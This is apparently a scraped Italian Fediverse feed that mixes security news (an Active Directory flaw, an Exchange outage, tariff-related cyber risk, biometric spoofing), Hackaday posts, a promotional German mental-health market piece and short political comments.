Gli esperti di sicurezza hanno osservato che un utente autenticato con privilegi limitati potrebbe potenzialmente sfruttare questa vulnerabilità per ottenere l’accesso a livello di SYSTEM, compromettendo di fatto interi domini. Il bug di sicurezza deriva da meccanismi di controllo degli accessi non adeguati all’interno di AD DS, che costituisce il fondamento dell’infrastruttura di sicurezza di rete Windows negli ambienti aziendali.

La vulnerabilità interessa diverse versioni di Windows Server, tra cui Server 2008, 2012, 2016, 2022 e la versione più recente, Windows Server 2025. Sono interessati anche i sistemi desktop che eseguono varie versioni di Windows 10 e Windows 11. Sebbene il vettore di attacco sia basato sulla rete, lo sfruttamento richiede un’elevata complessità, il che significa che gli aggressori dovrebbero raccogliere informazioni specifiche sull’ambiente ed eseguire ulteriori azioni preparatorie prima di riuscire nello sfruttamento.

Gli esperti di sicurezza paragonano questa vulnerabilità a precedenti falle di AD DS, come la vulnerabilità di escalation dei privilegi del 2022 (CVE-2022-26923) che consentiva agli utenti di dominio di aumentare i privilegi manipolando i certificati delle macchine emessi da Active Directory Certificate Services.

“Questa nuova vulnerabilità segue uno schema in cui i fallimenti nel controllo degli accessi possono portare all’escalation dei privilegi, consentendo potenzialmente agli aggressori di eseguire attacchi di sincronizzazione del controller di dominio”, ha spiegato un ricercatore di sicurezza informatica esperto di vulnerabilità di Active Directory.

L'articolo Windows Server: falla critica scoperta in Active Directory proviene da il blog della sicurezza informatica.



PAKISTAN. Arresti e deportazioni di massa per i migranti afgani


@Notizie dall'Italia e dal mondo
È iniziata la terza fase del “Piano di rimpatrio di stranieri illegali”, cominciato nel settembre 2023 e che ha riguardato da allora almeno 844.499 persone. Il governo di Islamabad giustifica il piano con la lotta a gruppi terroristici ma si tratta di un’operazione di pressione



PODCAST. Libano 1975. Le ferite mai rimarginate della guerra civile


@Notizie dall'Italia e dal mondo
50 anni dopo l'inizio del conflitto settario e politico interno, segnato da massacri e da decine di migliaia di civili e miliziani uccisi, il pericolo di una nuova guerra civile appare remoto sebbene sia sempre evocato. I libanesi ora fanno i conti prima di ogni altra cosa



Mi chiedo perché dubitare degli Stati Uniti, così affidabili, prevedibili e leali ai loro alleati.

[sarcasmo: attivo]


Sullo sfondo, la grande incognita: quale sarà la linea di Donald Trump. Taiwan teme che, una volta trasferita la produzione dei chip negli USA, venga abbandonata



HTTP 500 su Exchange Admin Center: blackout mondiale, amministratori bloccati!


Un’interruzione di carattere globale ha impedito agli amministratori di accedere a Exchange Admin Center (EAC). Il problema è stato messo immediatamente sotto indagine da parte di Microsoft. Da quando è avvenuta l’interruzione nella giornata di ieri, gli amministratori IT interessati hanno segnalato errori HTTP 500 quando tentavano di accedere al portale dell’interfaccia di amministrazione di Exchange.

Microsoft ha riportato che il problema è critico, il quale è stato portato all’attenzione con il bollettino EX1051697 relativo all’Interfaccia di amministrazione di Microsoft 365. Tuttavia, come suggerito anche da Microsoft, alcuni amministratori sono riusciti ad accedere al centro di amministrazione tramite la url admin.cloud.microsoft/exchange…

Microsoft ha affermato quanto segue: “Abbiamo identificato un aumento dei picchi di errore e stiamo indagando ulteriormente. Inoltre, stiamo esaminando le recenti modifiche apportate al servizio come possibile causa principale”. In un successivo aggiornamento del centro messaggi, Redmond ha affermato che i suoi ingegneri hanno riprodotto internamente il problema e raccolto ulteriori dati diagnostici per agevolare il processo di risoluzione dei problemi.

Per far fronte a questo problema, Microsoft ha iniziato a reindirizzare automaticamente gli amministratori all’URL funzionante come soluzione alternativa temporanea. Successivamente Microsoft ha riportato quanto segue: “Abbiamo identificato un potenziale problema di autenticazione in un percorso URL specifico e stiamo lavorando per mitigare il problema reindirizzando il traffico URL interessato a un URL funzionante”, ha affermato l’azienda in un aggiornamento dell’Interfaccia di amministrazione di Microsoft 365.

Al momento il problema è stato sanato da Microsoft e il servizio ha ripreso a funzionare regolarmente.

L'articolo HTTP 500 su Exchange Admin Center: blackout mondiale, amministratori bloccati! proviene da il blog della sicurezza informatica.



Germany's Focus on Neuropsychiatric Disorder Treatment: A News Overview


Berlin, Germany - Germany is increasingly prioritizing the treatment of neuropsychiatric disorders through innovative research, technological advancements, and policy changes. Here's a snapshot of recent developments:

Increased Prevalence Driving Market Growth: The

]German market for neuropsychiatric disorder treatment[/url] is experiencing significant growth, with an anticipated CAGR of over 10% between 2025 and 2035. This surge is fueled by a rising prevalence of conditions like depression, anxiety, and schizophrenia, affecting over 12 million individuals in Germany. Consequently, mental health is receiving greater attention in national health policies, leading to increased funding for research and treatment.

Germany Neuropsychiatric Disorders Treatment Market size

Digital Health and Telepsychiatry on the Rise: Technological advancements are transforming the landscape of mental healthcare in Germany. Telepsychiatry has gained considerable traction, particularly in rural areas, improving access to specialized care through remote consultations. Since the onset of the COVID-19 pandemic, the use of telepsychiatry has reportedly increased by over 40%, indicating a shift towards more accessible and convenient treatment options.

Personalized Treatment and Biomarker Research: There's a growing emphasis on personalized treatment approaches for neuropsychiatric disorders in Germany. This focus is driving research into biomarkers that can help tailor therapies to individual patient needs, potentially leading to more effective outcomes.

Industry Collaborations and Investments: Pharmaceutical and biotech companies in Germany are actively investing in the development of novel treatments for various neuropsychiatric conditions. For instance, in 2021, Boehringer Ingelheim partnered with the Lieber Institute for Brain Development to develop centrally acting COMT inhibitors for cognitive deficits in disorders like schizophrenia. More recently, in April 2024, the German mental health platform neurocare secured €16 million in funding to expand its digital therapy platform for a range of psychological and neurological conditions.

Focus on Rare Neurological Disorders: Germany is also making significant strides in researching and treating rare neurological disorders. The establishment of a new site of the German Center for Neurodegenerative Diseases (DZNE) in Ulm signifies a long-term commitment to funding research into conditions like ALS, frontotemporal dementia, and Huntington's disease. This site will focus on translational research, aiming to rapidly convert scientific findings into clinical applications.

Nanotechnology for Brain Disorders: Researchers like Danijela Gregurec are pioneering innovative approaches using functional nanomaterials that can be introduced into the brain to combat mental illnesses such as dementia, Alzheimer's, and panic disorders, showcasing the interdisciplinary nature of research in this field.

Addressing Mental Health in Children and Adolescents: Recognizing the increasing rates of mental health issues in younger populations, Germany opened the German Center for Prevention Research in Mental Health (DZPP) in Würzburg in April 2024. This interdisciplinary center focuses on developing and evaluating prevention programs for children and adolescents, bridging the gap between research and practical care.

Challenges in Refugee Mental Healthcare: Despite overall progress, concerns have been raised regarding cuts to mental health services for asylum seekers and refugees. Specialist clinics like Mosaik in Leipzig are facing significant budget reductions in 2025, raising fears about the impact on vulnerable individuals who have experienced trauma.

National Mental Health Surveillance: The Robert Koch Institute (RKI) is actively developing a national Mental Health Surveillance (MHS) system to continuously monitor the mental health of the German population. This initiative aims to provide regular data on key indicators, enabling informed public health responses.

Focus on Workplace Mental Health: The German Center for Mental Health (DZPG) is emphasizing the role of employers in promoting mental well-being. With mental illness being a significant cause of work absences, the DZPG advocates for more comprehensive and targeted workplace mental health initiatives.

Overall, Germany demonstrates a strong and evolving commitment to understanding and treating neuropsychiatric disorders through diverse research endeavors, technological integration, and increasing policy attention. While challenges remain in specific areas, the trend indicates a growing awareness and proactive approach to addressing the complex needs of individuals living with these conditions.

in reply to medicare

HALLO. Poliverso.org ist eine italienische Instanz. Ich schlage vor, dass Sie Ihr Konto hier löschen und sich bei einer englischsprachigen Instanz wie friendica.world anmelden.


Numeri di Mattarella e Meloni in vendita online: non è un problema cyber, ma di privacy


@Informatica (Italy e non Italy 😁)
Il caso di database con presunti numeri di personaggi pubblici in vendita indigna molti in queste ore, ma probabilmente non c'è stato nessun furto. Né un problema di cyber security.Di privacy violata però, forse, sì. Bene

reshared this



Making Liquid Oxygen: Far From Easy but Worth the Effort


Normally, videos over at The Signal Path channel on YouTube have a certain vibe, namely teardowns and deep dives into high-end test equipment for the microwave realm. And while we always love to see that kind of content, this hop into the world of cryogenics and liquid oxygen production shows that [Shahriar] has other interests, too.

Of course, to make liquid oxygen, one must first have oxygen. While it would be easy enough to get a tank of the stuff from a gas supplier, where’s the fun in that? So [Shahriar] started his quest with a cheap-ish off-the-shelf oxygen concentrator, one that uses the pressure-swing adsorption cycle we saw used to great effect with DIY O2 concentrators in the early days of the pandemic. Although analysis of the machine’s output revealed it wasn’t quite as capable as advertised, it still put out enough reasonably pure oxygen for the job at hand.

The next step in making liquid oxygen is cooling it, and for that job [Shahriar] turned to the cryocooler from a superconducting RF filter, a toy we’re keen to see more about in the future. For now, he was able to harvest the Stirling-cycle cryocooler and rig it up in a test stand with ample forced-air cooling for the heat rejection end and a manifold to supply a constant flow of oxygen from the concentrator. Strategically placed diodes were used to monitor the temperature at the cold end, a technique we can’t recall seeing before. Once powered up, the cryocooler got down to the 77 Kelvin range quite quickly, and within an hour, [Shahriar] had at least a hundred milliliters of lovely pale blue fluid that passed all the usual tests.

While we’ve seen a few attempts to make liquid nitrogen before, this might be the first time we’ve seen anyone make liquid oxygen. Hats off to [Shahriar] for the effort.

youtube.com/embed/kakZ_fhfUHU?…


hackaday.com/2025/04/09/making…

NixFREAK - reshared this.



Dazi americani: Perché le Guerre Commerciali Sono un Grosso Problema (Anche) per la Cybersecurity


Mentre i mercati globali e le cancellerie internazionali restano focalizzati sugli impatti economici diretti delle politiche tariffarie adottate o ventilate nel corso del 2025, la comunità della cybersecurity lancia un allarme su conseguenze meno evidenti ma potenzialmente devastanti: l’erosione della resilienza digitale globale. L’attuale scenario di tensioni commerciali, caratterizzato da dazi e restrizioni su beni tecnologici, sta infatti creando un terreno fertile per nuove e amplificate minacce informatiche.

L’intensificarsi delle tensioni commerciali nel 2025 genereranno rischi cyber spesso sottovalutati, minacciando le supply chain tecnologiche, alimentando le minacce state-sponsored e indebolendo le difese aziendali. Le misure protezionistiche, pur mirando a obiettivi economici, generano una serie di effetti collaterali che aumentano la superficie d’attacco e la vulnerabilità di aziende e infrastrutture critiche. Vediamo quali potranno essere i principali vettori di rischio:

  • 1. Supply Chain Tecnologica: Un Anello Debole Sotto Pressione I dazi rendono più costosi componenti elettronici e software da certe parti del mondo. Cosa succede? Le aziende, per risparmiare, potrebbero cercare scorciatoie, scegliendo fornitori più economici ma meno attenti alla sicurezza. Il rischio è trovarsi in casa (o in ufficio) hardware o software con “sorprese” nascoste: backdoor, malware, o semplicemente costruiti male e pieni di vulnerabilità. E in un mondo dove tutto è connesso, basta un ingranaggio “sbagliato” per creare un problema enorme. Sapere esattamente cosa c’è dentro i nostri dispositivi (le sigle SBOM e HBOM servono proprio a questo) diventa cruciale, ma non è ancora una pratica così diffusa.
  • 2. Dalle Tariffe ai Cyberattacchi: Un Passo Breve? Le dispute commerciali raramente rimangono confinate alla sfera economica. Storicamente, periodi di alta tensione internazionale hanno visto un incremento dell’attività cibernetica ostile attribuibile ad attori statali (Advanced Persistent Threats – APTs). Esiste una correlazione diretta tra l’imposizione di misure commerciali punitive e l’aumento di campagne di spionaggio industriale mirate a settori strategici del paese “avversario”, nonché attacchi potenzialmente distruttivi contro infrastrutture critiche (energia, finanza, sanità) come forma di ritorsione asimmetrica. Inoltre, il deterioramento delle relazioni diplomatiche mina la cooperazione internazionale nel contrasto al cybercrime e al cyberterrorismo, riducendo l’efficacia della condivisione di threat intelligence e delle operazioni congiunte contro le minacce globali.
  • 3. Budget per la Sicurezza: I Primi a Essere Tagliati? Le difficoltà economiche indotte dai dazi su import ed export possono erodere i margini di profitto aziendali. In tale contesto, i budget destinati alla cybersecurity, spesso percepiti erroneamente come centri di costo piuttosto che come investimenti strategici, rischiano tagli significativi. Una riduzione degli investimenti si traduce direttamente in una postura di sicurezza indebolita: meno personale qualificato, tecnologie di difesa obsolete, programmi di formazione ridotti, ritardi nell’adozione di architetture più robuste (es. Zero Trust) e una minore capacità di risposta agli incidenti. Questo crea un paradosso pericoloso: proprio quando il panorama delle minacce si fa più complesso a causa delle tensioni geopolitiche, le risorse per affrontarlo diminuiscono.
  • 4. Innovazione Bloccata = Tecnologia Meno Sicura Le politiche restrittive possono accelerare la tendenza verso ecosistemi tecnologici isolati (“splinternet”) e standard divergenti. Limitare l’accesso a tecnologie avanzate (es. semiconduttori di nuova generazione, piattaforme AI, apparati 5G/6G) non solo può frenare l’innovazione nel paese che impone i dazi, ma rischia anche di ritardare l’adozione di paradigmi di sicurezza più moderni ed efficaci incorporati in tali tecnologie. Questa frammentazione complica l’interoperabilità e la gestione della sicurezza su scala globale.


Quindi cosa fare?


E’ oramai palese che, nel 2025, non si può pensare alla cybersecurity senza considerare cosa succede nell’economia globale e nella politica internazionale. Sia le aziende che noi in qualità di utenti finali dobbiamo essere più consapevoli e:

  • Controllare bene i fornitori tech: Non guardare solo il prezzo, ma anche la sicurezza e la trasparenza di chi ci fornisce hardware e software.
  • Tenere d’occhio le tensioni globali: Capire da dove potrebbero arrivare le prossime minacce cyber è fondamentale.
  • Non tagliare sulla sicurezza: Investire in cybersecurity non è una spesa, ma una necessità per proteggere il business e i dati.
  • Collaborare (quando possibile): Condividere informazioni sulle minacce aiuta tutti a difendersi meglio.

In conclusione, ignorare l’interconnessione tra politiche commerciali e cybersecurity nel 2025 non è più un’opzione. La resilienza digitale richiede una vigilanza costante e una capacità di adattamento che trascenda i confini tradizionali della sicurezza informatica.

L'articolo Dazi americani: Perché le Guerre Commerciali Sono un Grosso Problema (Anche) per la Cybersecurity proviene da il blog della sicurezza informatica.



Il Mito della Biometria Sicura! La Verità Shock sui Nuovi Attacchi Digitali


Se ti violano la password, cambi la password. Se ti violano l’impronta digitale, non puoi cambiare il dito.

Fatta questa doverosa premessa, l’autenticazione biometrica sta sostituendo attivamente le password e i codici PIN tradizionali, offrendo un metodo più comodo e, come comunemente si ritiene e affidabile per confermare l’identità. Le impronte digitali, i tratti del viso, la voce e perfino la forma delle orecchie sono diventati parte del moderno panorama digitale.

Tuttavia, la rapida diffusione di tali tecnologie non è stata priva di conseguenze: oltre alla comodità, è aumentato anche il livello di abuso. L’interesse criminale per la biometria non è più ipotetico: i criminali sfruttano sempre più le sue vulnerabilità in attacchi reali.

Secondo i dati di Europol, il numero di casi legati all’inganno dei sistemi biometrici è aumentato in modo significativo. L’attenzione principale degli aggressori è rivolta ai cosiddetti attacchi di presentazione. La loro essenza è la falsificazione o l’imitazione delle caratteristiche biometriche allo scopo di ingannare il sistema di autenticazione.

Un esempio semplice potrebbe essere una replica in silicone di un’impronta digitale realizzata a partire da una fotografia o da un campione fisico. Tali falsi possono essere realizzati in casa utilizzando materiali facilmente reperibili; le moderne stampanti 3D consentono di creare repliche ancora più precise.

Anche i sistemi di riconoscimento facciale si stanno rivelando vulnerabili. I criminali utilizzano maschere in silicone, trucco, algoritmi di morphing software e tecnologie deepfake. Questi ultimi consentono non solo di modificare l’immagine, ma anche di sintetizzare la voce, imitando il discorso di una determinata persona.

Tali metodi vengono utilizzati attivamente per aggirare i sistemi di sicurezza, anche nei servizi bancari e governativi. Ad esempio, si sono verificati casi in cui i deepfake sono stati utilizzati per aggirare l’identificazione nei sistemi di servizi remoti. Come osserva Europol, il vettore dell’abuso non è più limitato alla falsificazione dei dati. Ciò include anche l’estrazione di profili biometrici che possono essere utilizzati a fini di tracciamento, ricatto o addirittura monitoraggio di massa.

Le tecnologie progettate per rafforzare la sicurezza si trasformano in un mezzo di attacco nelle mani dei criminali. Inoltre, una volta compromessi, i dati biometrici non possono essere sostituiti: a differenza di una password, un’impronta digitale o la forma del viso rimangono invariate per tutta la vita.

Per contrastare le nuove minacce Le forze dell’ordine devono andare oltre la risposta tradizionale. Europol sottolinea l’importanza di una stretta collaborazione con ricercatori ed esperti di sicurezza. Lavorando insieme possiamo non solo prevedere i vettori di attacco, ma anche implementare rapidamente misure di protezione. Ciò include il monitoraggio delle minacce, gli aggiornamenti tempestivi degli algoritmi e l’etichettatura e l’analisi obbligatorie degli incidenti correlati all’aggiramento dei sistemi biometrici.

Si propone di prestare particolare attenzione alla sensibilizzazione degli agenti di polizia, degli esperti investigativi e degli specialisti tecnici. Comprendere le specificità degli attacchi biometrici, essere in grado di riconoscere le tracce del loro utilizzo ed essere in grado di lavorare con i dati biometrici durante le indagini sta diventando di fondamentale importanza. Non si tratta solo di proteggere i sistemi, ma anche della qualificazione giuridica di tali reati, che è ancora ben lungi dall’essere perfetta.

Il rapporto di Europol sottolinea che senza una risposta adeguata da parte delle forze dell’ordine, la società rischia di perdere fiducia nella biometria come tecnologia del futuro. In un contesto in cui la criminalità informatica sta raggiungendo nuovi livelli, non servono solo soluzioni tecniche, ma anche l’elaborazione di una strategia chiara che unisca gli sforzi dello Stato, delle imprese e della comunità scientifica. Questo è l’unico modo per mantenere l’equilibrio tra sicurezza e praticità, che era originariamente al centro degli sviluppi biometrici.

L'articolo Il Mito della Biometria Sicura! La Verità Shock sui Nuovi Attacchi Digitali proviene da il blog della sicurezza informatica.

Gazzetta del Cadavere reshared this.



Ask Hackaday: Vibe Coding


Vibe coding is the buzzword of the moment. What is it? The practice of writing software by describing the problem to an AI large language model and using the code it generates. It’s not quite as simple as just letting the AI do your work for you because the developer is supposed to spend time honing and testing the result, and its proponents claim it gives a much more interactive and less tedious coding experience. Here at Hackaday, we are pleased to see the rest of the world catch up, because back in 2023, we were the first mainstream hardware hacking news website to embrace it, to deal with a breakfast-related emergency.

Jokes aside, though, the fad for vibe coding is something which should be taken seriously, because it’s seemingly being used in enough places that vibe coded software will inevitably affect our lives. So here’s the Ask Hackaday: is this a clever and useful tool for making better software more quickly, or a dangerous tool for creating software nobody quite understands, containing bugs which could cause a disaster?

Our approach to writing software has always been one of incrementally building something from the ground up, which satisfies the need. Readers will know that feeling of being in touch with how a project works at all levels, with a nose for immediately diagnosing any problems that might occur. If an AI writes the code for us, the feeling is that we might lose that connection, and inevitably this will lead to less experienced coders quickly getting out of their depth. Is this pessimism, or the grizzled voice of experience? We’d love to know your views in the comments. Are our new AI overlords the new senior developers? Or are they the worst summer interns ever?


hackaday.com/2025/04/09/ask-ha…



Going to the Top with a Raspberry Pi Elevator


[BorisDigital] was mesmerised by a modern elevator. He decided to see how hard it would be to design his own elevator based on Raspberry Pis. He started out with a panel for the elevator and a call panel for the elevator lobby. Of course, he would really need three call panels since he is pretending to have a three-floor building.

It all looks very professional, and he has lots of bells and whistles, including an actual alarm. With the control system perfected, it was time to think about the hydraulics and mechanical parts to make a door and an actual lift.

It is still just a model, but he does have 10A AC switches for the pumps. Everything talks via MQTT over WiFi. There’s also a web-based control dashboard. We didn’t count how many Pi boards are in the whole system, but it is definitely more than three.

If you are wondering why this was built, we are too. But then again, we never really need an excuse to go off on some project, so we can’t throw stones.

Want to see a more practical build? Check it out. Perhaps he’ll start on an escalator next.

youtube.com/embed/eTpAalJFUlY?…


hackaday.com/2025/04/09/going-…



Pino Riotta* Laura Tussi e Fabrizio Cracolici, coppia nella vita e nell’impegno per cercare di portare all’attenzione delle giovani generazioni i temi della Pace, della Resistenza e della Salvaguardia della Terra Intervista Video youtube.com/watch?v=mJYS7Ovl4x… Laura è una giornalista, una scrittrice, una docente e Fabrizio è un operatore di pace e videomaker. Insieme presentano il [...]

reshared this





CONFERENZA INTERNAZIONALE - Libertà per Öcalan – Una soluzione politica per la questione curda - Venerdì 11 aprile 2025 15:00 – 16:00 Apertura: Discorsi di Benvenuto e Messaggi Traduzione in curdo, italiano, inglese e spagnolo performance di apertura Yilmaz Orkan, Ufficio Informazione Kurdistan in Italia (UIKI Onlus) Salvatore Marra, Responsabile relazioni estere della Confederazione Generale Italiana [...]


FLOSS Weekly Episode 828: Incus Inception


This week, Jonathan Bennett and Rob Campbell talk to Stéphane Graber about LXC, Linux Containers, and Incus! Why did Incus fork from LXD, why are Fortune 500 companies embracing it, and why might it make sense for your home lab setup? Watch to find out!


youtube.com/embed/tiS7QU4ABnY?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License


hackaday.com/2025/04/09/floss-…



#Milei e la svendita della #Patagonia


altrenotizie.org/in-evidenza/1…


Uso corretto di e-mail e navigazione in rete: la posizione del Garante privacy


@Informatica (Italy e non Italy 😁)
La previsione nel Disciplinare tecnico di una sistematica raccolta e memorizzazione per un periodo di sei mesi dei log riferiti a posta elettronica, internet, rete interna e telefonia e la previsione di un accesso ai dispositivi aziendali è stato ritenuto in



Trump sospende i dazi per 90 giorni


Il presidente degli Stati Uniti Donald Trump ha annunciato una pausa di 90 giorni per i dazi ai Paesi che non hanno reagito al suo piano tariffario

Quest'uomo verrà ricordato come uno dei più grandi, insieme a Charlie Chaplin, Jerry Lewis e Woody Allen.

agi.it/estero/news/2025-04-09/…

in reply to Max su Poliverso 🇪🇺🇮🇹

@max lo vedo meglio in compagnia di altri entrate di razzo della Storia. Non so, gente come Nerone, o qualcosa così.


USA, la democrazia cancellata


altrenotizie.org/primo-piano/1…

Alberto V reshared this.



Re Carlo ricorda il coraggio della partigiana Del Din


Nel suo discorso alla Camera, re Carlo ha reso omaggio alla partigiana Paola Del Din. "Fu addestrata dalle forze britanniche e si sgancio' con il paracadute per la sua missione 80 anni fa proprio oggi", ha detto, "pensiamo tutti a Paola celebrando il suo coraggio".

E i fasci muti...

agi.it/politica/news/2025-04-0…

Alberto V reshared this.